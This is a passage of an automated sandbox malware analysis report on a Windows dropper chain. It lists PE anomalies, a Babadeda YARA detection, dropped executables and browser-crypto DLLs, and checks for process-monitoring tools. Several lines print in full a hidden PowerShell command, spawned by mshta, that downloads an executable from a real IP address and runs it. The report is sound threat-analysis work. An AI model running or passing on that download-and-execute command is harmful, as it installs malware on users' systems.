                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeUnpacked PE file: 43.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeUnpacked PE file: 44.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeUnpacked PE file: 58.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeUnpacked PE file: 59.2.jyidkjkfhjawd.exe.c00000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeUnpacked PE file: 73.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                                      Yara detected Babadeda
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1027024001\am.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe, type: DROPPED
                                      Suspicious powershell command line found
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: eXbhgU9[1].exe.15.drStatic PE information: 0xAAB116B5 [Thu Sep 30 01:13:25 2060 UTC]
                                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                      Source: 10DCQZI.exe.15.drStatic PE information: real checksum: 0x0 should be: 0xd497
                                      Source: iSHmPkn.exe.15.drStatic PE information: real checksum: 0x1a3eec should be: 0x1a1b22
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: real checksum: 0x0 should be: 0x13ab91
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: real checksum: 0x1a3eec should be: 0x1a1b22
                                      Source: av3EZhq.exe.15.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.drStatic PE information: real checksum: 0x31d37e should be: 0x3239b2
                                      Source: am[1].exe.15.drStatic PE information: real checksum: 0x0 should be: 0x21d41
                                      Source: av3EZhq[1].exe.15.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                      Source: 5EfYBe3nch.exeStatic PE information: real checksum: 0x1d375a should be: 0x1cd634
                                      Source: random[1].exe.2.drStatic PE information: real checksum: 0x31d37e should be: 0x3239b2
                                      Source: 10DCQZI[1].exe.15.drStatic PE information: real checksum: 0x0 should be: 0xd497
                                      Source: 483d2fa8a0d53818306efeb32d3.exe.34.drStatic PE information: real checksum: 0x31d37e should be: 0x3239b2
                                      Source: DLTDCR8UJINP8YM8Y.exe.0.drStatic PE information: real checksum: 0x4ee1c8 should be: 0x4f61f5
                                      Source: random[1].exe.15.drStatic PE information: real checksum: 0x1ce1fd should be: 0xeaeac
                                      Source: GIIIIJDHJE.exe.2.drStatic PE information: real checksum: 0x31d37e should be: 0x3239b2
                                      Source: skotes.exe.5.drStatic PE information: real checksum: 0x31d37e should be: 0x3239b2
                                      Source: am.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x21d41
                                      Source: eXbhgU9[1].exe.15.drStatic PE information: real checksum: 0x0 should be: 0x9001
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: real checksum: 0x1ce1fd should be: 0xeaeac
                                      Source: eXbhgU9.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x9001
                                      Source: 5EfYBe3nch.exeStatic PE information: section name:
                                      Source: 5EfYBe3nch.exeStatic PE information: section name: .idata
                                      Source: 5EfYBe3nch.exeStatic PE information: section name:
                                      Source: 5EfYBe3nch.exeStatic PE information: section name: dalsczsh
                                      Source: 5EfYBe3nch.exeStatic PE information: section name: bgqwnedu
                                      Source: 5EfYBe3nch.exeStatic PE information: section name: .taggant
                                      Source: DLTDCR8UJINP8YM8Y.exe.0.drStatic PE information: section name:
                                      Source: DLTDCR8UJINP8YM8Y.exe.0.drStatic PE information: section name: .idata
                                      Source: DLTDCR8UJINP8YM8Y.exe.0.drStatic PE information: section name: zrmackkh
                                      Source: DLTDCR8UJINP8YM8Y.exe.0.drStatic PE information: section name: rcriyoua
                                      Source: DLTDCR8UJINP8YM8Y.exe.0.drStatic PE information: section name: .taggant
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.drStatic PE information: section name:
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.drStatic PE information: section name: .idata
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.drStatic PE information: section name: tezivoqu
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.drStatic PE information: section name: tcaewlrx
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.drStatic PE information: section name: .taggant
                                      Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                                      Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                                      Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                                      Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                                      Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                                      Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                                      Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                                      Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                                      Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                                      Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                                      Source: GIIIIJDHJE.exe.2.drStatic PE information: section name:
                                      Source: GIIIIJDHJE.exe.2.drStatic PE information: section name: .idata
                                      Source: GIIIIJDHJE.exe.2.drStatic PE information: section name: tezivoqu
                                      Source: GIIIIJDHJE.exe.2.drStatic PE information: section name: tcaewlrx
                                      Source: GIIIIJDHJE.exe.2.drStatic PE information: section name: .taggant
                                      Source: random[1].exe.2.drStatic PE information: section name:
                                      Source: random[1].exe.2.drStatic PE information: section name: .idata
                                      Source: random[1].exe.2.drStatic PE information: section name: tezivoqu
                                      Source: random[1].exe.2.drStatic PE information: section name: tcaewlrx
                                      Source: random[1].exe.2.drStatic PE information: section name: .taggant
                                      Source: skotes.exe.5.drStatic PE information: section name:
                                      Source: skotes.exe.5.drStatic PE information: section name: .idata
                                      Source: skotes.exe.5.drStatic PE information: section name: tezivoqu
                                      Source: skotes.exe.5.drStatic PE information: section name: tcaewlrx
                                      Source: skotes.exe.5.drStatic PE information: section name: .taggant
                                      Source: am[1].exe.15.drStatic PE information: section name: .code
                                      Source: am.exe.15.drStatic PE information: section name: .code
                                      Source: random[1].exe.15.drStatic PE information: section name:
                                      Source: random[1].exe.15.drStatic PE information: section name: .idata
                                      Source: random[1].exe.15.drStatic PE information: section name:
                                      Source: random[1].exe.15.drStatic PE information: section name: cywnalex
                                      Source: random[1].exe.15.drStatic PE information: section name: reoqekwb
                                      Source: random[1].exe.15.drStatic PE information: section name: .taggant
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name:
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name: .idata
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name:
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name: cywnalex
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name: reoqekwb
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name: .taggant
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name:
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name: .idata
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name:
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name: xuvnqsmj
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name: dkjxiybl
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name: .taggant
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name:
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name: .idata
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name:
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name: xuvnqsmj
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name: dkjxiybl
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name: .taggant
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name:
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name:
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name:
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name:
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name:
                                      Source: 483d2fa8a0d53818306efeb32d3.exe.34.drStatic PE information: section name:
                                      Source: 483d2fa8a0d53818306efeb32d3.exe.34.drStatic PE information: section name: .idata
                                      Source: 483d2fa8a0d53818306efeb32d3.exe.34.drStatic PE information: section name: tezivoqu
                                      Source: 483d2fa8a0d53818306efeb32d3.exe.34.drStatic PE information: section name: tcaewlrx
                                      Source: 483d2fa8a0d53818306efeb32d3.exe.34.drStatic PE information: section name: .taggant
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_0049D91C push ecx; ret 5_2_0049D92F
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_00491359 push es; ret 5_2_0049135A
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FBD91C push ecx; ret 6_2_00FBD92F
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FBD91C push ecx; ret 7_2_00FBD92F
                                      Source: 5EfYBe3nch.exeStatic PE information: section name: entropy: 7.98283360449281
                                      Source: 5EfYBe3nch.exeStatic PE information: section name: dalsczsh entropy: 7.955197108012415
                                      Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe.0.drStatic PE information: section name: entropy: 7.138645527976382
                                      Source: GIIIIJDHJE.exe.2.drStatic PE information: section name: entropy: 7.138645527976382
                                      Source: random[1].exe.2.drStatic PE information: section name: entropy: 7.138645527976382
                                      Source: skotes.exe.5.drStatic PE information: section name: entropy: 7.138645527976382
                                      Source: random[1].exe.15.drStatic PE information: section name: entropy: 7.9821098884645165
                                      Source: random[1].exe.15.drStatic PE information: section name: cywnalex entropy: 7.9201905208706345
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name: entropy: 7.9821098884645165
                                      Source: 36ac23ea9d.exe.15.drStatic PE information: section name: cywnalex entropy: 7.9201905208706345
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name: entropy: 7.972643769197814
                                      Source: iSHmPkn[1].exe.15.drStatic PE information: section name: xuvnqsmj entropy: 7.953228779013761
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name: entropy: 7.972643769197814
                                      Source: iSHmPkn.exe.15.drStatic PE information: section name: xuvnqsmj entropy: 7.953228779013761
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name: entropy: 7.997518573935155
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name: entropy: 7.831462667091339
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name: entropy: 7.983042351633134
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name: entropy: 7.881268733146465
                                      Source: jyidkjkfhjawd.exe.17.drStatic PE information: section name: .data entropy: 7.981738077290403
                                      Source: 483d2fa8a0d53818306efeb32d3.exe.34.drStatic PE information: section name: entropy: 7.138645527976382

                                      Persistence and Installation Behavior

                                      barindex
                                      Drops PE files to the document folder of the user
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\Users\user\Documents\GIIIIJDHJE.exeJump to dropped file
                                      Tries to download and execute files (via powershell)
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027368001\36ac23ea9d.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\Users\user\Documents\GIIIIJDHJE.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeFile created: C:\YQNZByFp\jyidkjkfhjawd.exeJump to dropped file
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile created: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeJump to dropped file
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeFile created: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027060001\av3EZhq.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\rsn[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027024001\am.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\av3EZhq[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1026850001\rsn.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                                      Boot Survival

                                      barindex
                                      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWindow searched: window name: RegmonclassJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWindow searched: window name: FilemonclassJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeWindow searched: window name: RegmonclassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeWindow searched: window name: FilemonclassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
